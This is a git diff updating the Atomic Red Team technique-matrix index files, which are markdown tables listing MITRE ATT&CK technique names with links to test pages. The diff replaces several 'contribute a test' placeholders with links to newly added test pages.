 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -13,7 +13,7 @@
 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -33,9 +33,9 @@
 |  | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [Log Enumeration](../../T1654/T1654.md) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
 |  | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) |  | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  | Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | [Cloud Administration Command](../../T1651/T1651.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
+|  | [Serverless Execution](../../T1648/T1648.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Query Registry](../../T1012/T1012.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -10,7 +10,7 @@
 | [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
